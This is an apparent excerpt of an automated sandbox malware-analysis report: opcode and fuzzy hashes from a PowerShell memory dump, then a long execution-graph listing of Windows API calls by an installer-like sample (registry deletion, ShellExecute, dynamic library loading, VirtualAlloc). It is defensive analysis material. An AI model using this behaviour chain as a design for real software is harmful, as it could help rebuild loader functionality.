                                                                      • Opcode Fuzzy Hash: 8197cbf908d6f1dcd79a8845e6d55810eadadaeedb01a5a72aa90a19d10fb9de
                                                                      • Instruction Fuzzy Hash: BD119157E1E6DE0FFBAAA7280825568AE90DF1335176804FFD059CB1E3E9191C08C376
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD21755 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                                      • Instruction ID: 640da4617712010fe075815dca05181ff88b74f56b705a90032c7a08b54b7b65
                                                                      • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                                      • Instruction Fuzzy Hash: 7A01677111CB4C8FDB48EF0CE451AA6B7E0FB95324F10056DE59AC3692DA36E881CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD243D8 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b865c5bc032a394c0116fe8567dcb70c21d8ba004fcbe956123292334d8f30c
                                                                      • Instruction ID: 0afc095b700778a6a795eb43bb77c29b91ed31ec8242579bf274e3667868b2dd
                                                                      • Opcode Fuzzy Hash: 6b865c5bc032a394c0116fe8567dcb70c21d8ba004fcbe956123292334d8f30c
                                                                      • Instruction Fuzzy Hash: 1AF0303276C6484FD75CAA0CF8539F573D1E789220B50016EE48AC2697E916B842C685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD24392 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7054e7cb7dcb6e7fae5f0e5905047023f49ac2be80b6adb13109a51ac50abcd1
                                                                      • Instruction ID: 3d4a0e3a80e9c03b9983a72b142a620ce17f3291961dc0a074ec097f9844ee9c
                                                                      • Opcode Fuzzy Hash: 7054e7cb7dcb6e7fae5f0e5905047023f49ac2be80b6adb13109a51ac50abcd1
                                                                      • Instruction Fuzzy Hash: 32E0307276C6084F970C9A0CF8539B573D1E789224B40016EE48AC6696E916B8438785
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:18.8%
                                                                      Dynamic/Decrypted Code Coverage:15.2%
                                                                      Signature Coverage:18.7%
                                                                      Total number of Nodes:1485
                                                                      Total number of Limit Nodes:39
                                                                      execution_graph 4839 10001000 4842 1000101b 4839->4842 4849 100014d8 4842->4849 4844 10001020 4845 10001024 4844->4845 4846 10001027 GlobalAlloc 4844->4846 4847 100014ff 3 API calls 4845->4847 4846->4845 4848 10001019 4847->4848 4850 1000123b 3 API calls 4849->4850 4851 100014de 4850->4851 4852 100014e4 4851->4852 4853 100014f0 GlobalFree 4851->4853 4852->4844 4853->4844 4854 4022c0 4855 4022f0 4854->4855 4856 4022c5 4854->4856 4858 4029fd 18 API calls 4855->4858 4857 402b07 19 API calls 4856->4857 4859 4022cc 4857->4859 4860 4022f7 4858->4860 4861 4029fd 18 API calls 4859->4861 4864 40230d 4859->4864 4865 402a3d RegOpenKeyExA 4860->4865 4862 4022dd RegDeleteValueA RegCloseKey 4861->4862 4862->4864 4869 402a68 4865->4869 4872 402ab4 4865->4872 4866 402a8e RegEnumKeyA 4867 402aa0 RegCloseKey 4866->4867 4866->4869 4870 406009 3 API calls 4867->4870 4868 402ac5 RegCloseKey 4868->4872 4869->4866 4869->4867 4869->4868 4873 402a3d 3 API calls 4869->4873 4871 402ab0 4870->4871 4871->4872 4874 402ae0 RegDeleteKeyA 4871->4874 4872->4864 4873->4869 4874->4872 4875 4019c0 4876 4029fd 18 API calls 4875->4876 4877 4019c7 4876->4877 4878 4029fd 18 API calls 4877->4878 4879 4019d0 4878->4879 4880 4019d7 lstrcmpiA 4879->4880 4881 4019e9 lstrcmpA 4879->4881 4882 4019dd 4880->4882 4881->4882 4890 402b42 4891 402b51 SetTimer 4890->4891 4892 402b6a 4890->4892 4891->4892 4893 402bb8 4892->4893 4894 402bbe MulDiv 4892->4894 4895 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4894->4895 4895->4893 4897 4043c3 4898 4043d3 4897->4898 4899 4043f9 4897->4899 4900 403fcc 19 API calls 4898->4900 4901 404033 8 API calls 4899->4901 4902 4043e0 SetDlgItemTextA 4900->4902 4903 404405 4901->4903 4902->4899 4904 402645 4905 4029fd 18 API calls 4904->4905 4906 40264c FindFirstFileA 4905->4906 4907 40266f 4906->4907 4908 40265f 4906->4908 4912 405c3c wsprintfA 4907->4912 4910 402676 4913 405cde lstrcpynA 4910->4913 4912->4910 4913->4908 4914 404946 GetDlgItem GetDlgItem 4915 404998 7 API calls 4914->4915 4927 404bb0 4914->4927 4916 404a3b DeleteObject 4915->4916 4917 404a2e SendMessageA 4915->4917 4918 404a44 4916->4918 4917->4916 4919 404a7b 4918->4919 4921 405d00 18 API calls 4918->4921 4922 403fcc 19 API calls 4919->4922 4920 404c94 4923 404d40 4920->4923 4929 404ba3 4920->4929 4934 404ced SendMessageA 4920->4934 4924 404a5d SendMessageA SendMessageA 4921->4924 4928 404a8f 4922->4928 4925 404d52 4923->4925 4926 404d4a SendMessageA 4923->4926 4924->4918 4936 404d64 ImageList_Destroy 4925->4936 4937 404d6b 4925->4937 4945 404d7b 4925->4945 4926->4925 4927->4920 4944 404c21 4927->4944 4967 404894 SendMessageA 4927->4967 4933 403fcc 19 API calls 4928->4933 4930 404033 8 API calls 4929->4930 4935 404f36 4930->4935 4931 404c86 SendMessageA 4931->4920 4949 404a9d 4933->4949 4934->4929 4939 404d02 SendMessageA 4934->4939 4936->4937 4940 404d74 GlobalFree 4937->4940 4937->4945 4938 404eea 4938->4929 4946 404efc ShowWindow GetDlgItem ShowWindow 4938->4946 4942 404d15 4939->4942 4940->4945 4941 404b71 GetWindowLongA SetWindowLongA 4943 404b8a 4941->4943 4955 404d26 SendMessageA 4942->4955 4947 404b90 ShowWindow 4943->4947 4948 404ba8 4943->4948 4944->4920 4944->4931 4945->4938 4950 404db6 4945->4950 4972 404914 4945->4972 4946->4929 4965 404001 SendMessageA 4947->4965 4966 404001 SendMessageA 4948->4966 4949->4941 4951 404b6b 4949->4951 4954 404aec SendMessageA 4949->4954 4956 404b28 SendMessageA 4949->4956 4957 404b39 SendMessageA 4949->4957 4961 404de4 SendMessageA 4950->4961 4964 404dfa 4950->4964 4951->4941 4951->4943 4954->4949 4955->4923 4956->4949 4957->4949 4959 404ec0 InvalidateRect 4959->4938 4960 404ed6 4959->4960 4981 4047b2 4960->4981 4961->4964 4963 404e6e SendMessageA SendMessageA 4963->4964 4964->4959 4964->4963 4965->4929 4966->4927 4968 4048f3 SendMessageA 4967->4968 4969 4048b7 GetMessagePos ScreenToClient SendMessageA 4967->4969 4971 4048eb 4968->4971 4970 4048f0 4969->4970 4969->4971 4970->4968 4971->4944 4989 405cde lstrcpynA 4972->4989 4974 404927 4990 405c3c wsprintfA 4974->4990 4976 404931 4977 40140b 2 API calls 4976->4977 4978 40493a 4977->4978 4991 405cde lstrcpynA 4978->4991 4980 404941 4980->4950 4982 4047cc 4981->4982 4983 405d00 18 API calls 4982->4983 4984 404801 4983->4984 4985 405d00 18 API calls 4984->4985 4986 40480c 4985->4986 4987 405d00 18 API calls 4986->4987 4988 40483d lstrlenA wsprintfA SetDlgItemTextA 4987->4988 4988->4938 4989->4974 4990->4976 4991->4980 4009 4023c8 4020 402b07 4009->4020 4011 4023d2 4024 4029fd 4011->4024 4014 4023e5 RegQueryValueExA 4015 402405 4014->4015 4016 40240b RegCloseKey 4014->4016 4015->4016 4030 405c3c wsprintfA 4015->4030 4017 402663 4016->4017 4021 4029fd 18 API calls 4020->4021 4022 402b20 4021->4022 4023 402b2e RegOpenKeyExA 4022->4023 4023->4011 4025 402a09 4024->4025 4026 405d00 18 API calls 4025->4026 4027 402a2a 4026->4027 4028 4023db 4027->4028 4029 405f49 5 API calls 4027->4029 4028->4014 4028->4017 4029->4028 4030->4016 4995 401ccc GetDlgItem GetClientRect 4996 4029fd 18 API calls 4995->4996 4997 401cfc LoadImageA SendMessageA 4996->4997 4998 402892 4997->4998 4999 401d1a DeleteObject 4997->4999 4999->4998 5000 40474c 5001 404778 5000->5001 5002 40475c 5000->5002 5004 4047ab 5001->5004 5005 40477e SHGetPathFromIDListA 5001->5005 5011 4054d6 GetDlgItemTextA 5002->5011 5007 404795 SendMessageA 5005->5007 5008 40478e 5005->5008 5006 404769 SendMessageA 5006->5001 5007->5004 5009 40140b 2 API calls 5008->5009 5009->5007 5011->5006 5012 4024d1 5013 4024d6 5012->5013 5014 4024e7 5012->5014 5015 4029e0 18 API calls 5013->5015 5016 4029fd 18 API calls 5014->5016 5018 4024dd 5015->5018 5017 4024ee lstrlenA 5016->5017 5017->5018 5019 40250d WriteFile 5018->5019 5020 402663 5018->5020 5019->5020 4238 4025d3 4239 4025da 4238->4239 4241 40283f 4238->4241 4240 4029e0 18 API calls 4239->4240 4242 4025e5 4240->4242 4243 4025ec SetFilePointer 4242->4243 4243->4241 4244 4025fc 4243->4244 4246 405c3c wsprintfA 4244->4246 4246->4241 4276 4014d6 4277 4029e0 18 API calls 4276->4277 4278 4014dc Sleep 4277->4278 4280 402892 4278->4280 5028 401dd8 5029 4029fd 18 API calls 5028->5029 5030 401dde 5029->5030 5031 4029fd 18 API calls 5030->5031 5032 401de7 5031->5032 5033 4029fd 18 API calls 5032->5033 5034 401df0 5033->5034 5035 4029fd 18 API calls 5034->5035 5036 401df9 5035->5036 5037 401423 25 API calls 5036->5037 5038 401e00 ShellExecuteA 5037->5038 5039 401e2d 5038->5039 5040 40155b 5041 401577 ShowWindow 5040->5041 5042 40157e 5040->5042 5041->5042 5043 40158c ShowWindow 5042->5043 5044 402892 5042->5044 5043->5044 5045 401edc 5046 4029fd 18 API calls 5045->5046 5047 401ee3 GetFileVersionInfoSizeA 5046->5047 5048 401f06 GlobalAlloc 5047->5048 5049 401f5c 5047->5049 5048->5049 5050 401f1a GetFileVersionInfoA 5048->5050 5050->5049 5051 401f2b VerQueryValueA 5050->5051 5051->5049 5052 401f44 5051->5052 5056 405c3c wsprintfA 5052->5056 5054 401f50 5057 405c3c wsprintfA 5054->5057 5056->5054 5057->5049 5058 4040e0 lstrcpynA lstrlenA 5064 4018e3 5065 40191a 5064->5065 5066 4029fd 18 API calls 5065->5066 5067 40191f 5066->5067 5068 40559e 71 API calls 5067->5068 5069 401928 5068->5069 5070 4018e6 5071 4029fd 18 API calls 5070->5071 5072 4018ed 5071->5072 5073 4054f2 MessageBoxIndirectA 5072->5073 5074 4018f6 5073->5074 4031 401f68 4032 401f7a 4031->4032 4034 402028 4031->4034 4033 4029fd 18 API calls 4032->4033 4036 401f81 4033->4036 4035 401423 25 API calls 4034->4035 4041 402181 4035->4041 4037 4029fd 18 API calls 4036->4037 4038 401f8a 4037->4038 4039 401f92 GetModuleHandleA 4038->4039 4040 401f9f LoadLibraryExA 4038->4040 4039->4040 4042 401faf GetProcAddress 4039->4042 4040->4034 4040->4042 4043 401ffb 4042->4043 4044 401fbe 4042->4044 4045 404fc9 25 API calls 4043->4045 4046 401fc6 4044->4046 4047 401fdd 4044->4047 4048 401fce 4045->4048 4095 401423 4046->4095 4052 100016da 4047->4052 4048->4041 4050 40201c FreeLibrary 4048->4050 4050->4041 4053 1000170a 4052->4053 4098 10001a86 4053->4098 4055 10001711 4056 10001827 4055->4056 4057 10001722 4055->4057 4058 10001729 4055->4058 4056->4048 4144 100021ce 4057->4144 4127 10002218 4058->4127 4063 1000178d 4067 10001793 4063->4067 4068 100017cf 4063->4068 4064 1000176f 4157 100023d6 4064->4157 4065 10001758 4069 1000175d 4065->4069 4081 1000174e 4065->4081 4066 1000173f 4071 10001745 4066->4071 4076 10001750 4066->4076 4072 10001576 3 API calls 4067->4072 4074 100023d6 12 API calls 4068->4074 4154 10002abb 4069->4154 4071->4081 4140 10002800 4071->4140 4079 100017a9 4072->4079 4085 100017c1 4074->4085 4148 100025a2 4076->4148 4082 100023d6 12 API calls 4079->4082 4081->4063 4081->4064 4082->4085 4083 100017d6 4086 10001816 4083->4086 4181 1000239c 4083->4181 4085->4083 4086->4056 4088 10001820 GlobalFree 4086->4088 4088->4056 4092 10001802 4092->4086 4185 100014ff wsprintfA 4092->4185 4094 100017fb FreeLibrary 4094->4092 4096 404fc9 25 API calls 4095->4096 4097 401431 4096->4097 4097->4048 4188 10001215 GlobalAlloc 4098->4188 4100 10001aaa 4189 10001215 GlobalAlloc 4100->4189 4102 10001ab5 4190 1000123b 4102->4190 4104 10001ce4 GlobalFree GlobalFree GlobalFree 4106 10001d01 4104->4106 4115 10001d4b 4104->4115 4105 10001abd 4105->4104 4109 10001b89 GlobalAlloc 4105->4109 4111 10001bd4 lstrcpyA 4105->4111 4112 10001bf2 GlobalFree 4105->4112 4114 10001bde lstrcpyA 4105->4114 4105->4115 4119 10001f9c 4105->4119 4123 10001c30 4105->4123 4124 10001e97 GlobalFree 4105->4124 4126 10001224 2 API calls 4105->4126 4200 10001215 GlobalAlloc 4105->4200 4107 10001d16 4106->4107 4108 1000203c 4106->4108 4106->4115 4107->4115 4197 10001224 4107->4197 4110 1000205e GetModuleHandleA 4108->4110 4108->4115 4109->4105 4113 1000206f LoadLibraryA 4110->4113 4116 10002084 4110->4116 4111->4114 4112->4105 4113->4115 4113->4116 4114->4105 4115->4055 4116->4115 4117 100020e2 lstrlenA 4116->4117 4120 100020fb 4117->4120 4119->4115 4122 10001fe0 lstrcpyA 4119->4122 4120->4115 4122->4115 4123->4105 4195 10001551 GlobalSize GlobalAlloc 4123->4195 4124->4105 4126->4105 4133 10002230 4127->4133 4128 10001224 GlobalAlloc lstrcpynA 4128->4133 4129 1000123b 3 API calls 4129->4133 4131 10002365 GlobalFree 4132 1000172f 4131->4132 4131->4133 4132->4065 4132->4066 4132->4081 4133->4128 4133->4129 4133->4131 4134 100022ed GlobalAlloc MultiByteToWideChar 4133->4134 4136 100022cc lstrlenA 4133->4136 4203 100012bf 4133->4203 4135 10002317 GlobalAlloc 4134->4135 4137 100022db 4134->4137 4138 1000232e GlobalFree 4135->4138 4136->4131 4136->4137 4137->4131 4208 10002536 4137->4208 4138->4131 4142 10002812 4140->4142 4141 100028b7 CreateFileA 4143 100028d5 4141->4143 4142->4141 4143->4081 4145 100021de 4144->4145 4147 10001728 4144->4147 4146 100021f0 GlobalAlloc 4145->4146 4145->4147 4146->4145 4147->4058 4151 100025be 4148->4151 4149 10002622 4152 10002627 GlobalSize 4149->4152 4153 10002631 4149->4153 4150 1000260f GlobalAlloc 4150->4153 4151->4149 4151->4150 4152->4153 4153->4081 4155 10002ac6 4154->4155 4156 10002b06 GlobalFree 4155->4156 4159 100023f1 4157->4159 4160 10002437 wsprintfA 4159->4160 4161 10002518 GlobalFree 4159->4161 4162 100024af lstrcpynA 4159->4162 4163 100024ef GlobalFree 4159->4163 4165 1000248c WideCharToMultiByte 4159->4165 4166 10001278 2 API calls 4159->4166 4167 1000244b GlobalAlloc 4159->4167 4211 10001215 GlobalAlloc 4159->4211 4212 100012e8 4159->4212 4160->4159 4161->4159 4164 10001775 4161->4164 4162->4159 4163->4159 4170 10001576 4164->4170 4165->4159 4166->4159 4169 1000246c WideCharToMultiByte GlobalFree 4167->4169 4169->4159 4216 10001215 GlobalAlloc 4170->4216 4172 1000157c 4173 10001589 lstrcpyA 4172->4173 4175 100015a3 4172->4175 4176 100015bd 4173->4176 4175->4176 4177 100015a8 wsprintfA 4175->4177 4178 10001278 4176->4178 4177->4176 4179 10001281 GlobalAlloc lstrcpynA 4178->4179 4180 100012ba GlobalFree 4178->4180 4179->4180 4180->4083 4182 100023aa 4181->4182 4184 100017e2 4181->4184 4183 100023c3 GlobalFree 4182->4183 4182->4184 4183->4182 4184->4092 4184->4094 4186 10001278 2 API calls 4185->4186 4187 10001520 4186->4187 4187->4086 4188->4100 4189->4102 4191 10001274 4190->4191 4192 10001245 4190->4192 4191->4105 4192->4191 4201 10001215 GlobalAlloc 4192->4201 4194 10001251 lstrcpyA GlobalFree 4194->4105 4196 1000156f 4195->4196 4196->4123 4202 10001215 GlobalAlloc 4197->4202 4199 10001233 lstrcpynA 4199->4115 4200->4105 4201->4194 4202->4199 4204 100012e3 4203->4204 4205 100012c7 4203->4205 4204->4204 4205->4204 4206 10001224 2 API calls 4205->4206 4207 100012e1 4206->4207 4207->4133 4209 10002544 VirtualAlloc 4208->4209 4210 1000259a 4208->4210 4209->4210 4210->4137 4211->4159 4213 100012f1 4212->4213 4214 10001316 4212->4214 4213->4214 4215 100012fd lstrcpyA 4213->4215 4214->4159 4215->4214 4216->4172 5075 1000182a 5076 1000123b 3 API calls 5075->5076 5077 10001850 5076->5077 5078 1000123b 3 API calls 5077->5078 5079 10001858 5078->5079 5080 1000123b 3 API calls 5079->5080 5083 10001895 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5079->5083 5081 1000187a 5080->5081 5082 10001883 GlobalFree 5081->5082 5082->5083 5084 10001278 2 API calls 5083->5084 5085 10001a0c GlobalFree GlobalFree 5084->5085 5086 40286d SendMessageA 5087 402887 InvalidateRect 5086->5087 5088 402892 5086->5088 5087->5088 5089 4066ed 5093 40613c 5089->5093 5090 406aa7 5091 4061c6 GlobalAlloc 5091->5090 5091->5093 5092 4061bd GlobalFree 5092->5091 5093->5090 5093->5091 5093->5092 5093->5093 5094 406234 GlobalFree 5093->5094 5095 40623d GlobalAlloc 5093->5095 5094->5095 5095->5090 5095->5093 5103 4014f0 SetForegroundWindow 5104 402892 5103->5104 5105 401af0 5106 4029fd 18 API calls 5105->5106 5107 401af7 5106->5107 5108 4029e0 18 API calls 5107->5108 5109 401b00 wsprintfA 5108->5109 5110 402892 5109->5110 5111 4019f1 5112 4029fd 18 API calls 5111->5112 5113 4019fa ExpandEnvironmentStringsA 5112->5113 5114 401a0e 5113->5114 5116 401a21 5113->5116 5115 401a13 lstrcmpA 5114->5115 5114->5116 5115->5116 5124 10001637 5125 10001666 5124->5125 5126 10001a86 18 API calls 5125->5126 5127 1000166d 5126->5127 5128 10001680 5127->5128 5129 10001674 5127->5129 5131 100016a7 5128->5131 5132 1000168a 5128->5132 5130 10001278 2 API calls 5129->5130 5135 1000167e 5130->5135 5133 100016d1 5131->5133 5134 100016ad 5131->5134 5136 100014ff 3 API calls 5132->5136 5138 100014ff 3 API calls 5133->5138 5137 10001576 3 API calls 5134->5137 5139 1000168f 5136->5139 5140 100016b2 5137->5140 5138->5135 5141 10001576 3 API calls 5139->5141 5143 10001278 2 API calls 5140->5143 5142 10001695 5141->5142 5144 10001278 2 API calls 5142->5144 5145 100016b8 GlobalFree 5143->5145 5146 1000169b GlobalFree 5144->5146 5145->5135 5147 100016cc GlobalFree 5145->5147 5146->5135 5147->5135 5148 401c78 5149 4029e0 18 API calls 5148->5149 5150 401c7e IsWindow 5149->5150 5151 4019e1 5150->5151 4681 403af9 4682 403b11 4681->4682 4683 403c4c 4681->4683 4682->4683 4684 403b1d 4682->4684 4685 403c9d 4683->4685 4686 403c5d GetDlgItem GetDlgItem 4683->4686 4688 403b28 SetWindowPos 4684->4688 4689 403b3b 4684->4689 4687 403cf7 4685->4687 4698 401389 2 API calls 4685->4698 4690 403fcc 19 API calls 4686->4690 4692 404018 SendMessageA 4687->4692 4699 403c47 4687->4699 4688->4689 4693 403b40 ShowWindow 4689->4693 4694 403b58 4689->4694 4691 403c87 KiUserCallbackDispatcher 4690->4691 4695 40140b 2 API calls 4691->4695 4720 403d09 4692->4720 4693->4694 4696 403b60 DestroyWindow 4694->4696 4697 403b7a 4694->4697 4695->4685 4700 403f55 4696->4700 4701 403b90 4697->4701 4702 403b7f SetWindowLongA 4697->4702 4703 403ccf 4698->4703 4700->4699 4712 403f86 ShowWindow 4700->4712 4705 403c39 4701->4705 4706 403b9c GetDlgItem 4701->4706 4702->4699 4703->4687 4707 403cd3 SendMessageA 4703->4707 4704 403f57 DestroyWindow EndDialog 4704->4700 4711 404033 8 API calls 4705->4711 4709 403bcc 4706->4709 4710 403baf SendMessageA IsWindowEnabled 4706->4710 4707->4699 4708 40140b 2 API calls 4708->4720 4714 403bd9 4709->4714 4717 403c20 SendMessageA 4709->4717 4718 403bec 4709->4718 4725 403bd1 4709->4725 4710->4699 4710->4709 4711->4699 4712->4699 4713 405d00 18 API calls 4713->4720 4714->4717 4714->4725 4715 403fa5 SendMessageA 4719 403c07 4715->4719 4716 403fcc 19 API calls 4716->4720 4717->4705 4721 403bf4 4718->4721 4722 403c09 4718->4722 4719->4705 4720->4699 4720->4704 4720->4708 4720->4713 4720->4716 4727 403fcc 19 API calls 4720->4727 4742 403e97 DestroyWindow 4720->4742 4724 40140b 2 API calls 4721->4724 4723 40140b 2 API calls 4722->4723 4726 403c10 4723->4726 4724->4725 4725->4715 4726->4705 4726->4725 4728 403d84 GetDlgItem 4727->4728 4729 403da1 ShowWindow KiUserCallbackDispatcher 4728->4729 4730 403d99 4728->4730 4751 403fee KiUserCallbackDispatcher 4729->4751 4730->4729 4732 403dcb EnableWindow 4735 403ddf 4732->4735 4733 403de4 GetSystemMenu EnableMenuItem SendMessageA 4734 403e14 SendMessageA 4733->4734 4733->4735 4734->4735 4735->4733 4752 404001 SendMessageA 4735->4752 4753 405cde lstrcpynA 4735->4753 4738 403e42 lstrlenA 4739 405d00 18 API calls 4738->4739 4740 403e53 SetWindowTextA 4739->4740 4741 401389 2 API calls 4740->4741 4741->4720 4742->4700 4743 403eb1 CreateDialogParamA 4742->4743 4743->4700 4744 403ee4 4743->4744 4745 403fcc 19 API calls 4744->4745 4746 403eef GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4745->4746 4747 401389 2 API calls 4746->4747 4748 403f35 4747->4748 4748->4699 4749 403f3d ShowWindow 4748->4749 4750 404018 SendMessageA 4749->4750 4750->4700 4751->4732 4752->4735 4753->4738 5152 1000103d 5153 1000101b 8 API calls 5152->5153 5154 10001056 5153->5154 5155 4014fe 5156 401506 5155->5156 5158 401519 5155->5158 5157 4029e0 18 API calls 5156->5157 5157->5158 5159 100020be 5160 100020cf 5159->5160 5161 100020e2 lstrlenA 5160->5161 5162 10002031 5160->5162 5161->5162 4791 40227f 4792 4029fd 18 API calls 4791->4792 4793 402290 4792->4793 4794 4029fd 18 API calls 4793->4794 4795 402299 4794->4795 4796 4029fd 18 API calls 4795->4796 4797 4022a3 GetPrivateProfileStringA 4796->4797 5163 401000 5164 401037 BeginPaint GetClientRect 5163->5164 5165 40100c DefWindowProcA 5163->5165 5167 4010f3 5164->5167 5168 401179 5165->5168 5169 401073 CreateBrushIndirect FillRect DeleteObject 5167->5169 5170 4010fc 5167->5170 5169->5167 5171 401102 CreateFontIndirectA 5170->5171 5172 401167 EndPaint 5170->5172 5171->5172 5173 401112 6 API calls 5171->5173 5172->5168 5173->5172 5174 402602 5175 402892 5174->5175 5176 402609 5174->5176 5177 40260f FindClose 5176->5177 5177->5175 5178 402683 5179 4029fd 18 API calls 5178->5179 5180 402691 5179->5180 5181 4026a7 5180->5181 5182 4029fd 18 API calls 5180->5182 5183 40594a 2 API calls 5181->5183 5182->5181 5184 4026ad 5183->5184 5204 40596f GetFileAttributesA CreateFileA 5184->5204 5186 4026ba 5187 402763 5186->5187 5188 4026c6 GlobalAlloc 5186->5188 5191 40276b DeleteFileA 5187->5191 5192 40277e 5187->5192 5189 40275a CloseHandle 5188->5189 5190 4026df 5188->5190 5189->5187 5205 4031cc SetFilePointer 5190->5205 5191->5192 5194 4026e5 5195 4031b6 ReadFile 5194->5195 5196 4026ee GlobalAlloc 5195->5196 5197 402732 WriteFile GlobalFree 5196->5197 5198 4026fe 5196->5198 5199 402f1f 46 API calls 5197->5199 5200 402f1f 46 API calls 5198->5200 5201 402757 5199->5201 5203 40270b 5200->5203 5201->5189 5202 402729 GlobalFree 5202->5197 5203->5202 5204->5186 5205->5194 5213 401705 5214 4029fd 18 API calls 5213->5214 5215 40170c SearchPathA 5214->5215 5216 401727 5215->5216 5218 4027bd 5215->5218 5216->5218 5219 405cde lstrcpynA 5216->5219 5219->5218 3876 405107 3877 4052b4 3876->3877 3878 405129 GetDlgItem GetDlgItem GetDlgItem 3876->3878 3880 4052e4 3877->3880 3881 4052bc GetDlgItem CreateThread FindCloseChangeNotification 3877->3881 3922 404001 SendMessageA 3878->3922 3883 405312 3880->3883 3884 405333 3880->3884 3885 4052fa ShowWindow ShowWindow 3880->3885 3881->3880 3995 40509b OleInitialize 3881->3995 3882 40519a 3889 4051a1 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3882->3889 3886 40531a 3883->3886 3887 40536d 3883->3887 3931 404033 3884->3931 3927 404001 SendMessageA 3885->3927 3891 405322 3886->3891 3892 405346 ShowWindow 3886->3892 3887->3884 3898 40537a SendMessageA 3887->3898 3896 405210 3889->3896 3897 4051f4 SendMessageA SendMessageA 3889->3897 3928 403fa5 3891->3928 3894 405366 3892->3894 3895 405358 3892->3895 3900 403fa5 SendMessageA 3894->3900 3945 404fc9 3895->3945 3901 405223 3896->3901 3902 405215 SendMessageA 3896->3902 3897->3896 3903 405393 CreatePopupMenu 3898->3903 3904 40533f 3898->3904 3900->3887 3923 403fcc 3901->3923 3902->3901 3956 405d00 3903->3956 3908 405233 3909 405270 GetDlgItem SendMessageA 3908->3909 3910 40523c ShowWindow 3908->3910 3909->3904 3916 405297 SendMessageA SendMessageA 3909->3916 3913 405252 ShowWindow 3910->3913 3914 40525f 3910->3914 3911 4053c1 GetWindowRect 3912 4053d4 TrackPopupMenu 3911->3912 3912->3904 3915 4053f0 3912->3915 3913->3914 3926 404001 SendMessageA 3914->3926 3917 40540f SendMessageA 3915->3917 3916->3904 3917->3917 3918 40542c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3917->3918 3920 40544e SendMessageA 3918->3920 3920->3920 3921 405470 GlobalUnlock SetClipboardData CloseClipboard 3920->3921 3921->3904 3922->3882 3924 405d00 18 API calls 3923->3924 3925 403fd7 SetDlgItemTextA 3924->3925 3925->3908 3926->3909 3927->3883 3929 403fb2 SendMessageA 3928->3929 3930 403fac 3928->3930 3929->3884 3930->3929 3932 40404b GetWindowLongA 3931->3932 3942 4040d4 3931->3942 3933 40405c 3932->3933 3932->3942 3934 40406b GetSysColor 3933->3934 3935 40406e 3933->3935 3934->3935 3936 404074 SetTextColor 3935->3936 3937 40407e SetBkMode 3935->3937 3936->3937 3938 404096 GetSysColor 3937->3938 3939 40409c 3937->3939 3938->3939 3940 4040a3 SetBkColor 3939->3940 3941 4040ad 3939->3941 3940->3941 3941->3942 3943 4040c0 DeleteObject 3941->3943 3944 4040c7 CreateBrushIndirect 3941->3944 3942->3904 3943->3944 3944->3942 3946 405087 3945->3946 3947 404fe4 3945->3947 3946->3894 3948 405001 lstrlenA 3947->3948 3949 405d00 18 API calls 3947->3949 3950 40502a 3948->3950 3951 40500f lstrlenA 3948->3951 3949->3948 3953 405030 SetWindowTextA 3950->3953 3954 40503d 3950->3954 3951->3946 3952 405021 lstrcatA 3951->3952 3952->3950 3953->3954 3954->3946 3955 405043 SendMessageA SendMessageA SendMessageA 3954->3955 3955->3946 3972 405d0d 3956->3972 3957 405f30 3958 4053a3 AppendMenuA 3957->3958 3990 405cde lstrcpynA 3957->3990 3958->3911 3958->3912 3960 405dae GetVersion 3960->3972 3961 405f07 lstrlenA 3961->3972 3964 405d00 10 API calls 3964->3961 3966 405e26 GetSystemDirectoryA 3966->3972 3967 405e39 GetWindowsDirectoryA 3967->3972 3969 405e6d SHGetSpecialFolderLocation 3969->3972 3973 405e85 SHGetPathFromIDListA CoTaskMemFree 3969->3973 3970 405d00 10 API calls 3970->3972 3971 405eb0 lstrcatA 3971->3972 3972->3957 3972->3960 3972->3961 3972->3964 3972->3966 3972->3967 3972->3969 3972->3970 3972->3971 3974 405bc5 RegOpenKeyExA 3972->3974 3979 405f49 3972->3979 3988 405c3c wsprintfA 3972->3988 3989 405cde lstrcpynA 3972->3989 3973->3972 3975 405c36 3974->3975 3976 405bf8 RegQueryValueExA 3974->3976 3975->3972 3977 405c19 RegCloseKey 3976->3977 3977->3975 3986 405f55 3979->3986 3980 405fc1 CharPrevA 3983 405fbd 3980->3983 3981 405fb2 CharNextA 3981->3983 3981->3986 3983->3980 3984 405fdc 3983->3984 3984->3972 3985 405fa0 CharNextA 3985->3986 3986->3981 